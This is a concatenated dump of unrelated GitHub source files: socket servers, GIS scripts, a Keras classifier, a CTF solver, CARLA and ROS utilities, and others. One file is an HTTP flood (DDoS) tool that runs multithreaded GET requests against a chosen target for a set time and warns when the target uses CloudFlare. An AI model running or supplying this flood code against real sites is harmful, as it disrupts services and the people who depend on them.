s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind((listenAddr, listenPort))
s.listen(1) # allow only one outstanding request
# s is a factory for connected sockets
conn, addr = s.accept() # wait until incoming connection request (and accept it)
print('Connected by', addr)
archive = os.open("ArchivedFileByServer.txt",os.O_CREAT | os.O_RDWR)
while 1:
data = conn.recv(100)
print("RECEIVING:")
print(data)
os.write(archive,data)
if len(data) == 0:
print("Zero length read, finished getting archive")
break
def recBytes2():
sys.path.append("../lib") # for params
switchesVarDefaults = (
(('-l', '--listenPort') ,'listenPort', 50001),
(('-?', '--usage'), "usage", False), # boolean (set if present)
)
progname = "echoserver"
paramMap = params.parseParams(switchesVarDefaults)
listenPort = paramMap['listenPort']
listenAddr = '' # Symbolic name meaning all available interfaces
if paramMap['usage']:
params.usage()
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind((listenAddr, listenPort))
s.listen(1) # allow only one outstanding request
# s is a factory for connected sockets
while 1:
conn, addr = s.accept() # wait until incoming connection request (and accept it)
rc = os.fork()
if rc < 0:
print("fork failed")
elif rc == 0:
print("child will execute")
print('Connected by', addr)
archive = os.open("ArchivedFileByServer.txt",os.O_CREAT | os.O_RDWR)
while 1:
data = conn.recv(100)
print("RECEIVING:")
print(data)
os.write(archive,data)
if len(data) == 0:
print("Zero length read, finished getting archive")
break
unarchiver2()
sys.exit(1)
else:
os.wait()
continue
def unarchiver():
archive = os.open("ArchivedFileByServer.txt", os.O_RDONLY)
os.mkdir("UnArchivedFile")
os.chdir("UnArchivedFile")
header = os.read(archive,4)
header = bytes(header)
firstFileTitle = (os.read(archive,header[1])).decode()
firstFile = os.open(firstFileTitle, os.O_CREAT | os.O_RDWR)
os.write(firstFile, os.read(archive,header[3]))
os.close(firstFile)
while type(header) != None:
try:
header = os.read(archive,4)
header = bytes(header)
except:
header = None
continue
if len(header) == 0:
break
nextFileTitle = (os.read(archive,header[1])).decode()
nextFile = os.open(nextFileTitle, os.O_CREAT | os.O_RDWR)
os.write(nextFile, os.read(archive,header[3]))
os.close(nextFile)
os.close(archive)
def unarchiver2():
archive = os.open("/home/ldd775/os-project3-framing-lddavila/lib/ArchivedFileByServer.txt", os.O_RDONLY)
directoryUserWantsToMake = input("Please enter the name of the file you want to unarchive into.")
os.mkdir(directoryUserWantsToMake)
os.chdir(directoryUserWantsToMake)
header = os.read(archive,4)
header = bytes(header)
while(type(header) != None):
# print("Value of the header",header)
# print("Value of header[3]", header[3])
# print("Class of header[3]",type(header[3]))
if len(header) == 0:
break
fileBeingRestoredTitle = (os.read(archive,header[1])).decode()
fileBeingRestored = os.open(fileBeingRestoredTitle, os.O_CREAT | os.O_RDWR)
# print("Class of fileBeingRestored", type(fileBeingRestored))
# print("Class of archive", type(archive))
os.write(fileBeingRestored,os.read(archive,header[3]))
try:
header = os.read(archive,4)
header = bytes(header)
except:
header = None
continue
print("Value of header",header)
print("length of header",len(header))
if len(header) == 0:
break
while (header[1] == 0):
os.write(fileBeingRestored,os.read(archive,header[3]))
header = os.read(archive,4)
header = bytes(header)
os.close(fileBeingRestored)
if __name__ == "__main__":
recBytes2()
#unarchiver2() | utep-cs-systems-courses/os-project3-framing-lddavila | lib/framingServer.py | framingServer.py | py | 5,153 | python | en | code | 0 | github-code | 36 |
43660570358 | import arcpy
import os
import csv
def aggregate_by_route_by_injury_type(route_fc, crash_fc, gdb, distance):
"""Iterates through the bus route data and aggregates the number and type of injuries within the search distance"""
arcpy.env.workspace = gdb
route_dictionary = {}
for row in arcpy.da.SearchCursor(route_fc, ["ROUTE_TOM", "AGENCY"]):
route = row[0]
agency = row[1]
if (route, agency) not in route_dictionary:
route_dictionary[(route, agency)] = {}
current_layer = os.path.join(gdb, "current")
sql_query = "\"ROUTE_TOM\" = '" + str(route) + "' AND \"AGENCY\" = '" + agency + "'"
arcpy.MakeFeatureLayer_management(route_fc, current_layer, sql_query)
arcpy.MakeFeatureLayer_management(crash_fc, "crashes")
arcpy.SelectLayerByLocation_management("crashes", "WITHIN_A_DISTANCE", current_layer, distance, "NEW_SELECTION")
selected_crashes = os.path.join(gdb, "selected")
arcpy.CopyFeatures_management("crashes", selected_crashes)
for row2 in arcpy.da.SearchCursor(selected_crashes, ["INJY_STAT_DESCR"]):
if row2[0] not in route_dictionary[(route, agency)]:
route_dictionary[(route, agency)][row2[0]] = 1
else:
route_dictionary[(route, agency)][row2[0]] += 1
arcpy.Delete_management(current_layer)
arcpy.Delete_management("crashes")
arcpy.Delete_management(selected_crashes)
return route_dictionary
def write_results_to_text_file(route_dictionary, output_path):
"""Writes the results of the aggregated crash data to a tab-delimited file"""
with open(output_path, "wb") as text_file:
writer = csv.writer(text_file, delimiter="\t")
legend = ["Bus Route", "Agency", "Injury Type", "Count"]
writer.writerow(legend)
for (route, agency) in route_dictionary:
for injury in route_dictionary[(route, agency)]:
row = [route, agency, injury, route_dictionary[(route, agency)][injury]]
writer.writerow(row)
del text_file
def write_results_to_gis_feature_class(route_dictionary, gis_fc):
"""Adds the aggregated injury data to a feature class"""
injury_type_list = ["Fatal injury", "Non-fatal injury - Incapacitating", "Non-fatal injury - Non-incapacitating",
"Non - fatal injury - Possible"]
for i in injury_type_list:
arcpy.AddField_management(gis_fc, i, "SHORT")
arcpy.AddField_management(gis_fc, "EPDO", "LONG")
fields = ["ROUTE_TOM", "AGENCY", "EPDO"] + [i.replace(" ", "_").replace("-", "_") for i in injury_type_list]
with arcpy.da.UpdateCursor(gis_fc, fields) as cursor:
for row in cursor:
key = (row[0], row[1])
if key in route_dictionary:
total = 0
for inj in injury_type_list:
if inj in route_dictionary[key]:
total += (route_dictionary[key][inj] * 10 if inj == "Fatal injury" else route_dictionary[key][inj] * 5)
injury = inj.replace(" ", "_").replace("-", "_")
row[fields.index(injury)] = route_dictionary[key][inj]
row[2] = total
cursor.updateRow(row)
del cursor
return
buses_fc = r"U:\Projects\Tasks_For_Bonnie\Bicyclist_Bus_Routes_092116\bicyclist_bus_routes_092116.gdb\MBTA_Bus_Routes"
crashes_fc = r"U:\Projects\Tasks_For_Bonnie\Bicyclist_Bus_Routes_092116\bicyclist_bus_routes_092116.gdb\bicyclist_crashes_with_mbta_120516"
geodatabase = r"U:\Projects\Tasks_For_Bonnie\Bicyclist_Bus_Routes_092116\output.gdb"
out_file = os.path.join(r"U:\Projects\Tasks_For_Bonnie\Bicyclist_Bus_Routes_092116", "Bicyclist Route Crashes MBTA - 120716.txt")
route_dict = aggregate_by_route_by_injury_type(buses_fc, crashes_fc, geodatabase, "50 Feet")
write_results_to_text_file(route_dict, out_file)
write_results_to_gis_feature_class(route_dict, buses_fc)
| ttlin1/Bus | determine_number_crashes_for_each_route.py | determine_number_crashes_for_each_route.py | py | 4,071 | python | en | code | 0 | github-code | 36 |
43696108113 | import os
from math import ceil
from keras import backend
from keras import optimizers
from keras.applications.vgg19 import VGG19
from keras.applications.resnet50 import ResNet50
from keras.layers import Dense, Flatten, BatchNormalization, Dropout
from keras.models import Sequential, Model
from keras.callbacks import EarlyStopping, ModelCheckpoint, ReduceLROnPlateau
# from keras.utils import plot_model
from tensor_board import MyTensorBoard
from parallel_model import ParallelModel
class ImageClassifier:
root_path = ""
input_shape = ()
output_size = 0
model = None
def __init__(self, root_path, input_shape, output_size):
self.root_path = root_path
self.input_shape = input_shape
self.output_size = output_size
self.base_model = VGG19(weights='imagenet', include_top=False, input_shape=self.input_shape)
self.model = Sequential()
self.model.add(self.base_model)
self.model.add(Flatten())
self.model.add(Dense(self.output_size, activation='sigmoid'))
# self.base_model = ResNet50(include_top=False, input_shape=self.input_shape, pooling='avg', weights='imagenet')
# x = self.base_model.output
# x = Dense(2048, activation='relu')(x)
# x = Dropout(0.25)(x)
# output = Dense(self.output_size, activation='sigmoid')(x)
# self.model = Model(inputs=self.base_model.inputs, outputs=output)
# self.model = ParallelModel(self.model, gpus=4)
# plot_model(self.model, to_file=os.path.join(root_path, 'model.png'))
@staticmethod
def f2(y_true, y_pred):
def recall(y_true, y_pred):
true_positives = backend.sum(backend.round(backend.clip(y_true * y_pred, 0, 1)))
possible_positives = backend.sum(backend.round(backend.clip(y_true, 0, 1)))
recall = true_positives / (possible_positives + backend.epsilon())
return recall
def precision(y_true, y_pred):
true_positives = backend.sum(backend.round(backend.clip(y_true * y_pred, 0, 1)))
predicted_positives = backend.sum(backend.round(backend.clip(y_pred, 0, 1)))
precision = true_positives / (predicted_positives + backend.epsilon())
return precision
precision = precision(y_true, y_pred)
recall = recall(y_true, y_pred)
beta_squared = 4
return (beta_squared + 1) * ((precision * recall) / (beta_squared * precision + recall + backend.epsilon()))
def train(self, x, y, batch_size, validation_data, lr, epochs, idx_split=0):
self.model.compile(loss='binary_crossentropy',
optimizer=optimizers.Adam(lr=lr),
metrics=['accuracy', self.f2])
early_stop = EarlyStopping(patience=2)
model_checkpoint = ModelCheckpoint(self.__get_weights_path(idx_split), save_best_only=True)
reduce_lr = ReduceLROnPlateau(patience=2, cooldown=2)
tensor_board = MyTensorBoard(log_dir=self.__get_logs_path(idx_split, lr, epochs), write_images=True)
self.model.fit(x=x,
y=y,
validation_data=validation_data,
batch_size=batch_size,
epochs=epochs,
callbacks=[early_stop, reduce_lr, model_checkpoint, tensor_board])
def train_generator(self, train_gen, train_size, valid_gen, valid_size, batch_size, lr, decay, epochs, idx_split=0):
self.model.compile(loss='binary_crossentropy',
optimizer=optimizers.Adam(lr=lr, decay=decay),
metrics=['accuracy', self.f2])
early_stop = EarlyStopping(patience=4, min_delta=1e-4)
model_checkpoint = ModelCheckpoint(self.__get_weights_path(idx_split), save_best_only=True)
tensor_board = MyTensorBoard(log_dir=self.__get_logs_path(idx_split, lr, epochs), write_images=True)
self.model.fit_generator(generator=train_gen,
steps_per_epoch=(train_size // batch_size + 1),
epochs=epochs,
shuffle=False,
validation_data=valid_gen,
validation_steps=(valid_size // batch_size + 1),
callbacks=[early_stop, model_checkpoint, tensor_board])
def predict(self, x, batch_size):
return self.model.predict(x=x, batch_size=batch_size)
def predict_generator(self, test_gen, test_size, batch_size):
return self.model.predict_generator(generator=test_gen, steps=(test_size // batch_size + 1))
def save(self, idx_split=0):
self.model.save_weights(self.__get_weights_path(idx_split))
def load(self, idx_split=0):
self.model.load_weights(self.__get_weights_path(idx_split))
def load_if_exist(self, idx_split):
weights_path = self.__get_weights_path(idx_split)
if os.path.isfile(weights_path):
self.model.load_weights(weights_path)
def set_trainable(self, trainable):
for layer in self.base_model.layers:
layer.trainable = trainable
def __get_weights_path(self, idx_split):
return os.path.join(self.root_path, 'models', 'split{}.h5'.format(idx_split))
def __get_logs_path(self, idx_split, lr, epochs):
return os.path.join(self.root_path, 'logs', 'split{}-lr{}-epochs{}'.format(idx_split, lr, epochs))
| anson627/kaggle | planet/lib/classifier.py | classifier.py | py | 5,485 | python | en | code | 0 | github-code | 36 |
25634514682 | import claripy
import code
from hashlib import sha512
import json
import sys
b = [claripy.BVS('b_%d' % i, 1) for i in range(33896)]
s = claripy.Solver()
with open("map3.txt", 'r') as f:
cipher, chalbox = json.loads(f.read())
length, gates, check = chalbox
for i in range(33767,33896):
name, args = gates[i-128]
if name == 'false':
s.add(b[i]==claripy.BVV(0,1))
else:
if args[0][1] == True:
arg1 = 1
else:
arg1 = 0
if args[1][1] == True:
arg2 = 1
else:
arg2 = 0
u1 = b[args[0][0]] ^ arg1
u2 = b[args[1][0]] ^ arg2
if name == 'or':
s.add(b[i] == u1)
elif name == 'xor':
s.add(b[i] == u2)
s.add(b[33895] == 0)
for i in range(0, 33896):
if len(s.eval(b[i],2)) == 1:
b[i] = s.eval(b[i],1)[0]
code.interact(local=locals())
| posgnu/ctfs | pctf2018/3iscABC/sol.py | sol.py | py | 907 | python | en | code | 1 | github-code | 36 |
990448118 | import requests
import random
import time
from threading import Thread
# Import modules for HTTP flood
import tools.randomData as randomData
import tools.ipTools as ipTools
def HTTP_ATTACK(threads, attack_time, target):
# Finish
global FINISH
FINISH = False
if ipTools.isCloudFlare(target):
if not input("[?] Current site is under CloudFlare protection. Do you want to continue? (y/n)\n >>> ") in ("y", "Y", "1"):
exit()
print("[#] Attack started for " + str(attack_time) + " secounds..")
threads_list = []
# Load 25 random user agents
user_agents = []
for _ in range(threads):
user_agents.append( randomData.random_useragent() )
# HTTP flood
def http_flood():
global FINISH
while True:
if FINISH:
break
payload = str(random._urandom(random.randint(1, 30)))
headers = {
"X-Requested-With": "XMLHttpRequest",
"Connection": "keep-alive",
"Pragma": "no-cache",
"Cache-Control": "no-cache",
"Accept-Encoding": "gzip, deflate, br",
"User-agent": random.choice(user_agents)
}
try:
r = requests.get(target, params = payload)
except Exception as e:
print(e)
time.sleep(2)
else:
print("[" + str(r.status_code) + "] Request sent! Payload size: " + str(len(payload)))
# Start threads
for thread in range(0, threads):
print("[#] Staring thread " + str(thread))
t = Thread(target = http_flood)
t.start()
threads_list.append(t)
# Sleep selected secounds
time.sleep(attack_time)
# Terminate threads
for thread in threads_list:
FINISH = True
thread.join()
print("[!] HTTP attack stopped!") | Marshmello1912/Git | Impulse/tools/L7/http.py | http.py | py | 1,653 | python | en | code | 0 | github-code | 36 |
38552357203 | '''
# the Space Complexity is O(1) and the Time Complexity is O(N)
def caesar_enc(str, key):
alpha = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', ' j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u',
'v', 'w', 'x', 'y', 'z' ] # or say alpha=list("abcdefjhijklmnopqrstuwuxyz")
HashTable = {}
string = []
for i in range(key, key - 26, -1):
HashTable[alpha[i - key]] = alpha[i]
for char in str:
string.append(HashTable[char])
return "".join(string)
string="abcdab"
print(caesar_enc(string, 2))
'''
# the Space Complexity is O(1) and the Time Complexity is O(N) (more practical than above)
def caesar_enc(str, key):
newLetter=[]
for letter in str:
newLetter.append(getNewLetter(letter,key))
return "".join(newLetter)
def getNewLetter(letter,key):
codedletter=ord(letter)+key
print(codedletter)
return chr(codedletter) if codedletter<=122 else chr(96+codedletter%122)
string = "abcdab"
print(caesar_enc(string, 2))
| pro-ghanem/MY-DSA-Problem-Solving | String Manipulation/Caeser Encrypter.py | Caeser Encrypter.py | py | 1,006 | python | en | code | 0 | github-code | 36 |
75121574505 | import unittest
import requests
URL = 'http://127.0.0.1:8000/segment'
IMAGE_PATH = './data/test_image/'
IMAGE_NAME = '0bf631128.jpg'
IMAGE_FORMAT = 'image/jpeg'
class ImageSegmentationTest(unittest.TestCase):
def test_image_segmentation(self):
with open(IMAGE_PATH+IMAGE_NAME, 'rb') as image_file:
image_data = image_file.read()
headers = {'accept': 'application/json'}
files = {
'file': (IMAGE_NAME, image_data, IMAGE_FORMAT)
}
response = requests.post(URL, headers=headers, files=files)
self.assertEqual(response.status_code, 200)
response_json = response.json()
self.assertIn("segmented_image", response_json)
def test_missing_image_file(self):
headers = {'accept': 'application/json'}
files = {}
response = requests.post(URL, headers=headers, files=files)
self.assertEqual(response.status_code, 422)
if __name__ == '__main__':
unittest.main()
| MykytaKyt/airbus-ship-detection | tests/test_app.py | test_app.py | py | 994 | python | en | code | 0 | github-code | 36 |
25842561969 | from sqlalchemy import ForeignKey, Table, Column
from sqlalchemy.sql.sqltypes import Integer, String, Float, Boolean, Date
from config.db import meta, engine
castings = Table("castings", meta,
Column("id", Integer, primary_key=True),
Column("castingDate", Date),
Column("name", String(255)),
Column("castingDirector", Integer, ForeignKey("people.id")),
Column("director", Integer, ForeignKey("people.id")),
Column("inPerson", Boolean),
Column("inProcess", Boolean),
Column("notes", String(355)))
meta.create_all(engine) | Lorea13/Profesionales-del-Arte | backend/models/casting.py | casting.py | py | 554 | python | en | code | 0 | github-code | 36 |
2112950145 | import json
class SettingFile(object):
def __init__(self, path, defaults):
self._defaults = defaults
self._path = path
self._data = dict()
self._callbacks = dict()
for setting in defaults:
self._callbacks[setting] = callback_assist()
self.load()
def load(self):
'''Attempts to load the file'''
try:
new_data = json.load(open(self._path))
except:
json.dump(
self._defaults,
open(self._path, 'w'),
indent=2,
sort_keys=True
)
new_data = self._defaults.copy()
for setting in self._defaults:
if setting in new_data:
self[setting] = new_data[setting]
else:
self[setting] = self._defaults[setting]
def save(self):
json.dump(
self._data,
open(self._path, 'w'),
indent=2,
sort_keys=True
)
def register_callback(self, setting_name, funct, args=None):
self._callbacks[setting_name].add_callback(funct, args)
def __getitem__(self, *args):
return self._data.get(*args)
def __setitem__(self, key, val):
if key not in self._defaults:
raise ValueError('Unknown Setting')
else:
self._data[key] = val
self._callbacks[key].fire()
self.save()
def __str__(self):
return "Settings in {}: {}".format(self._path, self._data)
def __repr__(self):
return "setting_file({}, {})".format(self._path, self._defaults)
class callback_assist(object):
'''This class represents a function with arguments'''
def __init__(self):
self.callbacks = list()
def add_callback(self, funct, args=None):
'''Adds a new callback'''
if args == None:
args = list()
self.callbacks.append((funct, args))
def fire(self):
'''Fires all the callbacks'''
for funct, args in self.callbacks:
funct(*args)
| sdfgeoff/newsscroller | setting_file.py | setting_file.py | py | 2,100 | python | en | code | 0 | github-code | 36 |
22541773169 | # RA, 2020-10-13
import contextlib
import io
@contextlib.contextmanager
def open_maybe_gz(file, *, mode='r'):
"""
Open `file` for reading that could be a
- file descriptor
- path to file
- path to gzipped file
`mode` is either 'r' or 'rb', and has to be specified.
Usage:
with open_maybe_gz(path_to_file, mode='r') as fd:
print(fd.read())
"""
assert mode in ['r', 'rb']
if isinstance(file, io.IOBase):
yield file
return
from pathlib import Path
assert Path(file).is_file()
file = str(file)
if file.endswith(".gz"):
import gzip
with gzip.open(file, mode='rb') as fd:
if (mode == 'r'):
yield io.TextIOWrapper(fd)
elif (mode == 'rb'):
yield fd
else:
with open(file, mode=mode) as fd:
yield fd
| Luca-Blum/Computational_Biomedicine | project1/solution/humdum/io/gz.py | gz.py | py | 891 | python | en | code | 0 | github-code | 36 |
37980420317 | import random
from enum import Enum
fifth_ed_bad_reactions = ["cringe.jpg", "mike.jpg", "nat1.gif", "nat1.jpg", "jazz.jpg"]
fifth_ed_good_reactions = ["heisenberg.gif", "joji.jpg", "mcmahon.gif", "nat20.jpg"]
sw_bad_reactions = ["bad1.gif", "bad2.gif", "bad3.gif", "bad4.gif",
"bad5.gif", "bad6.jpg", "bad7.jpg", "bad8.jpg", "bad9.gif", "bad10.gif"]
sw_good_reactions = ["good1.gif", "good2.gif", "good3.gif",
"good4.gif", "good5.gif", "good6.gif", "good7.gif", "good8.gif"]
class GameMode(Enum):
WIZARDS_FIFTH_ED = 1
STAR_WARS_FIFTH_ED = 2
def get_good_reaction (current_gamemode):
path = "resources/reactions/5e/good/" + random.choice(fifth_ed_good_reactions)
if current_gamemode == GameMode.STAR_WARS_FIFTH_ED:
path = "resources/reactions/sw5e/good/" + random.choice(sw_good_reactions)
return path
def get_bad_reaction(current_gamemode):
path = "resources/reactions/5e/bad/" + random.choice(fifth_ed_bad_reactions)
if current_gamemode == GameMode.STAR_WARS_FIFTH_ED:
path = "resources/reactions/sw5e/bad/" + random.choice(sw_bad_reactions)
return path
| SPIGS/DiceBot | gamemode.py | gamemode.py | py | 1,148 | python | en | code | 1 | github-code | 36 |
30810878899 |
import serial
import KeyConfig as kc
import struct
import socket
IP = '192.168.1.200'
PORT = 12345
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
s.setblocking(False)
def read_data():
d: bytes = ser.readline()
if len(d) > 0:
res = d.decode().replace('\r\n', '')
return res
def send_color_data(color:tuple):
packet = struct.pack("4f",*color,1)
s.sendto(packet, (IP,PORT))
print("send: %s" % packet)
def send_command_data(command:float):
packet = struct.pack("f",command)
s.sendto(packet, (IP,PORT))
print("send: %s" % packet)
if __name__ == '__main__':
ser = serial.Serial('COM5', 9600)
while True:
data: bytes = ser.read_until(expected=b"\r\n")
data = data.replace(b"\r\n",b'')
int_data = int.from_bytes(data,byteorder="big")
print(int_data)
if len(data) > 0:
if kc.colors.get(int_data):
print("ok")
color_to_send = kc.colors[int_data]
send_color_data(color_to_send)
elif kc.commands.get(int_data):
print("command")
command_to_send = kc.commands[int_data]
send_command_data(command_to_send)
| AssoAndrea/UE-ArduinoLightController | PythonMiddleware/main.py | main.py | py | 1,249 | python | en | code | 1 | github-code | 36 |
37877826411 | import os
import re
import shutil
from glob import glob
from osrf_pycommon.process_utils import AsyncSubprocessProtocol
from catkin_tools.common import mkdir_p
from catkin_tools.terminal_color import fmt
from .events import ExecutionEvent
MAX_LOGFILE_HISTORY = 10
class IOBufferContainer(object):
"""A simple buffer container for use in logging.
This class will open a logfile for a given job stage and write to it
continuously while receiving stdout and stderr.
"""
def __init__(self, label, job_id, stage_label, event_queue, log_path):
self.label = label
self.job_id = job_id
self.stage_label = stage_label
self.event_queue = event_queue
self.log_path = log_path
self.is_open = False
self.stdout_buffer = b""
self.stderr_buffer = b""
self.interleaved_buffer = b""
# Construct the logfile path for this job and stage
logfile_dir_path = os.path.join(log_path, self.job_id)
self.logfile_basename = os.path.join(logfile_dir_path, '.'.join([self.label, self.stage_label]))
self.logfile_name = '{}.log'.format(self.logfile_basename)
# Create the logfile dir if it doesn't exist
if not os.path.exists(logfile_dir_path):
mkdir_p(logfile_dir_path)
# Get the existing number of logfiles
# TODO: Make this number global across all build stages
existing_logfile_indices = sorted([int(lf.split('.')[-2])
for lf in glob('{}.*.log'.format(self.logfile_basename))])
if len(existing_logfile_indices) == 0:
self.logfile_index = 0
else:
self.logfile_index = 1 + existing_logfile_indices[-1]
# Generate the logfile name
self.unique_logfile_name = '{}.{:0>{}}.log'.format(self.logfile_basename, self.logfile_index, 3)
# Remove colliding file if necessary
if os.path.exists(self.logfile_name):
os.unlink(self.logfile_name)
# Open logfile
self.log_file = open(self.logfile_name, 'wb')
self.is_open = True
def close(self):
# Close logfile
self.log_file.close()
self.is_open = False
# Copy logfile to unique name
shutil.copy(self.logfile_name, self.unique_logfile_name)
# Remove older logfiles
for logfile_name in glob('{}.*.log'.format(self.logfile_basename)):
if (self.logfile_index - int(logfile_name.split('.')[-2])) >= MAX_LOGFILE_HISTORY:
os.unlink(logfile_name)
# Save output from stderr (these don't get deleted until cleaning the logfile directory)
if len(self.stderr_buffer) > 0:
with open(self.unique_logfile_name + '.stderr', 'wb') as logfile:
logfile.write(self.stderr_buffer)
def get_interleaved_log(self):
"""get decoded interleaved log."""
try:
return self._decode(self.interleaved_buffer)
except UnicodeDecodeError:
return "interleaved_log: some output cannot be displayed.\n"
def get_stdout_log(self):
"""get decoded stdout log."""
try:
return self._decode(self.stdout_buffer)
except UnicodeDecodeError:
return "stdout_log: some output cannot be displayed.\n"
def get_stderr_log(self):
"""get decoded stderr log."""
try:
return self._decode(self.stderr_buffer)
except UnicodeDecodeError:
return "stderr_log: some output cannot be displayed.\n"
@staticmethod
def _encode(data):
"""Encode a Python str into bytes.
:type data: str
"""
return data.encode('utf8')
@staticmethod
def _decode(data):
"""Decode bytes into Python str.
:type data: bytes
"""
return data.decode('utf-8', 'replace')
def __del__(self):
if self.is_open:
self.close()
@classmethod
def factory(cls, label, job_id, stage_label, event_queue, log_path):
"""Factory method for constructing with job metadata."""
def init_proxy(*args, **kwargs):
return cls(label, job_id, stage_label, event_queue, log_path, *args, **kwargs)
return init_proxy
class IOBufferLogger(IOBufferContainer):
"""This is a logging class to be used instead of sys.stdout and sys.stderr
in FunctionStage operations.
This class also generates `stdout` and `stderr` events.
"""
def __init__(self, label, job_id, stage_label, event_queue, log_path, *args, **kwargs):
IOBufferContainer.__init__(self, label, job_id, stage_label, event_queue, log_path)
def out(self, data, end='\n'):
"""
:type data: str
:type end: str
"""
# Buffer the encoded data
data += end
encoded_data = self._encode(data)
self.stdout_buffer += encoded_data
self.interleaved_buffer += encoded_data
# Save the encoded data
self.log_file.write(encoded_data)
# Emit event with decoded Python str
self.event_queue.put(ExecutionEvent(
'STDOUT',
job_id=self.job_id,
stage_label=self.stage_label,
data=data))
def err(self, data, end='\n'):
"""
:type data: str
:type end: str
"""
# Buffer the encoded data
data += end
encoded_data = self._encode(data)
self.stderr_buffer += encoded_data
self.interleaved_buffer += encoded_data
# Save the encoded data
self.log_file.write(encoded_data)
# Emit event with decoded Python str
self.event_queue.put(ExecutionEvent(
'STDERR',
job_id=self.job_id,
stage_label=self.stage_label,
data=data))
class IOBufferProtocol(IOBufferContainer, AsyncSubprocessProtocol):
"""An asyncio protocol that collects stdout and stderr.
This class also generates `stdout` and `stderr` events.
Since the underlying asyncio API constructs the actual protocols, this
class provides a factory method to inject the job and stage information
into the created protocol.
"""
def __init__(self, label, job_id, stage_label, event_queue, log_path, *args, **kwargs):
IOBufferContainer.__init__(self, label, job_id, stage_label, event_queue, log_path)
AsyncSubprocessProtocol.__init__(self, *args, **kwargs)
self.intermediate_stdout_buffer = b''
self.intermediate_stderr_buffer = b''
@staticmethod
def _split(data):
try:
last_break = data.rindex(b'\n') + 1
return data[0:last_break], data[last_break:]
except ValueError:
return b'', data
def on_stdout_received(self, data):
"""
:type data: encoded bytes
"""
data, self.intermediate_stdout_buffer = self._split(self.intermediate_stdout_buffer + data)
self.stdout_buffer += data
self.interleaved_buffer += data
self.log_file.write(data)
# Get the decoded Python str
decoded_data = self._decode(data)
# Emit event with decoded Python str
self.event_queue.put(ExecutionEvent(
'STDOUT',
job_id=self.job_id,
stage_label=self.stage_label,
data=decoded_data))
def on_stderr_received(self, data):
"""
:type data: encoded bytes
"""
data, self.intermediate_stderr_buffer = self._split(self.intermediate_stderr_buffer + data)
self.stderr_buffer += data
self.interleaved_buffer += data
self.log_file.write(data)
# Get the decoded Python str
decoded_data = self._decode(data)
# Emit event with decoded Python str
self.event_queue.put(ExecutionEvent(
'STDERR',
job_id=self.job_id,
stage_label=self.stage_label,
data=decoded_data))
def on_process_exited2(self, returncode):
"""
Dump anything remaining in the intermediate buffers.
"""
if len(self.intermediate_stdout_buffer) > 0:
self.on_stdout_received(self.intermediate_stdout_buffer + b'\n')
if len(self.intermediate_stderr_buffer) > 0:
self.on_stderr_received(self.intermediate_stderr_buffer + b'\n')
class CatkinTestResultsIOBufferProtocol(IOBufferProtocol):
"""An IOBufferProtocol which parses the output of catkin_test_results"""
def on_stdout_received(self, data):
lines = data.decode().splitlines()
clines = []
for line in lines:
match = re.match(r'(.*): (\d+) tests, (\d+) errors, (\d+) failures, (\d+) skipped', line)
if match:
line = fmt('@!{}@|: {} tests, @{rf}{} errors@|, @{rf}{} failures@|, @{kf}{} skipped@|')
line = line.format(*match.groups())
clines.append(line)
cdata = '\n'.join(clines) + '\n'
super(CatkinTestResultsIOBufferProtocol, self).on_stdout_received(cdata.encode())
| catkin/catkin_tools | catkin_tools/execution/io.py | io.py | py | 9,125 | python | en | code | 153 | github-code | 36 |
6171191684 | def find_Team(t, n, l):
if n > l : return l
if n == l : t.append(l)
if (2*n + 1) < l:
t.append(2*n + 1)
find_Team(t, 2*n + 1, l)
if (2*n + 2) < l:
t.append(2*n + 2)
find_Team(t, 2*n + 2, l)
return t
def compare(n, m):
power1 = 0
power2 = 0
for i in n: power1 += power[i]
for j in m: power2 += power[j]
if power1 > power2: return f"{n[0]}>{m[0]}"
elif power1 < power2: return f"{n[0]}<{m[0]}"
return f"{n[0]}={m[0]}"
power, order = input('Enter Input : ').split('/')
power = [int(i) for i in power.split()]
print(sum(power))
for e in order.split(','):
a, b = [int(i) for i in e.split()]
team1 = find_Team([a], a, len(power))
team2 = find_Team([b], b, len(power))
print(compare(team1, team2)) | PPZeen/OODS_Exersice | Tree/tree2_4.py | tree2_4.py | py | 805 | python | en | code | 0 | github-code | 36 |
23155147064 | import logging
import os
from datetime import datetime
file_name=f"{datetime.now().strftime('%d_%m_%Y_%H_%M_%S')}.log"
logs_path=os.path.join(os.getcwd(),"logs",file_name)
os.makedirs(logs_path,exist_ok=True)
logs_file_path=os.path.join(logs_path,file_name)
logging.basicConfig(filename=logs_file_path,
format="[%(asctime)s] %(lineno)d %(name)s-%(levelname)s-%(message)s",
level=logging.INFO)
#if __name__=="__main__":
# logging.info("logging started") | Hema9121/second-hema-ml-repo | src/logger.py | logger.py | py | 500 | python | en | code | 0 | github-code | 36 |
27930609748 | # Sum of even-valued fibonacci numbers less than or equal to 4 million
def fibonacci(n):
if n <= 1:
return n
else:
return (fibonacci(n-1) + fibonacci(n-2))
total = 0
for i in range(34):
f = fibonacci(i)
if f % 2 == 0:
total = total + f
print(total)
| vandervel/Project-Euler-Problems | solutions/problem2.py | problem2.py | py | 328 | python | en | code | 0 | github-code | 36 |
13979863718 | def read_inputs(input_file):
with open(input_file, 'r') as f:
lines = f.read().splitlines()
data = []
for line in lines:
l = line.split(" ")
data.append([l[0], int(l[1])])
return data
def pilot(input):
horiz_pos = 0
depth = 0
aim = 0
for cmd in input:
entry = cmd[0]
if "forward" == entry:
horiz_pos = horiz_pos + cmd[1]
depth = depth + (aim * cmd[1])
if "down" == entry:
aim = aim + cmd[1]
if "up" == entry:
aim = aim - cmd[1]
return horiz_pos, depth
if __name__ == "__main__":
input_file = "/Users/brad/github/advent2021/input2.txt"
input = read_inputs(input_file)
print(input)
horiz_pos, depth = pilot(input)
print(horiz_pos, depth, horiz_pos*depth) | brad-trantham/adventofcode2021 | src/pilot.py | pilot.py | py | 820 | python | en | code | 0 | github-code | 36 |
73971404584 | from scripts.util.joystick import Joystick
from carla_env import CarlaEnv
from wrapped_carla_env import BiasedAction
import time
import carla
import pygame
import numpy as np
class ManualInterface:
def __init__(self, env: CarlaEnv):
# create env
self.env = env
self.obs = None
self.rew = None
self.done = False
self.reset_env()
self.total_reward = None
# init pygame
pygame.init()
self.running = True
self.surface = None
# font
self.font = pygame.font.Font(pygame.font.get_default_font(), 30)
# control
self.joysticks = None
